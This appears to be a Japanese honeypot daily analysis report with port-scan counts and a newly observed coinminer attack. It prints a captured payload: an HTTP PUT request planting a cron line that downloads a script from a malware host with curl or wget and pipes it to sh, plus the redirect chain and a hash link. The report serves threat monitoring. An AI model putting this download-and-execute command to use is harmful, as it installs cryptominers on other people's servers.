【ハニーポット簡易分析】Honeypot簡易分析(302日目:6/14)
Honeypot簡易分析(302日目:6/14)となります。
◾️Honeypot
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(前日比)>
ポート番号 | サービス | 件数 | 前日比(%) |
---|---|---|---|
445 | smb | 3757 | -152 |
23 | telnet | 1197 | -10 |
5900 | vnc | 843 | -111 |
3389 | rdp | 267 | 40 |
7070 | Unknown | 201 | 196 |
3306 | mysql | 154 | -39 |
2323 | telnet | 148 | 71 |
443 | https | 75 | 38 |
5038 | Unknown | 70 | 65 |
20547 | Unknown | 60 | 31 |
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 3757 | -235 |
23 | telnet | 1197 | -428 |
5900 | vnc | 843 | -4309 |
3389 | rdp | 267 | -1100 |
7070 | Unknown | 201 | 199 |
3306 | mysql | 154 | -90 |
2323 | telnet | 148 | 35 |
443 | https | 75 | 22 |
5038 | Unknown | 70 | 69 |
20547 | Unknown | 69 | +69 |
<新規マルウェアダウンロード>
マルウェア ダウンロード先 |
ペイロード |
---|---|
lsd.systemten.org | PUT /fileserver/go.txt HTTP/1.1 Host: 160.xxx.xxx.xxx:8161 User-Agent: Go-http-client/1.1 Content-Length: 80 Accept-Encoding: gzip Connection: close */15 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd[.]systemten[.]org)|sh.## |
PUTコマンドでCoinminer系マルウェアを設置しようとしているものでした。
マルウェア設置時に他のCoinminerを削除する動きも確認出来ました。
また、攻撃元を確認してみると国内でした。OSINTで調査したところ、明らかに放置されていそうなサイトが非常に多かったです。
削除例:
通信遷移:
hxxps://pastebin[.]com/raw/QYzP0YtR
→hxxp://img[.]sobot[.]com/chatres/89/msg/20190614/ac98b0269eb447a9960369b9a0affaa2.png
→Coinminer系マルウェア
https://www.virustotal.com/gui/file/48a3dc61e357d6e9b4eb07d1e253004f9dc361432f0515cff9399b7612ef62c2/detection
◾️WoWHoneeypot
※80ポートは除く
<国別検知数および検知数>
<検知パス一覧>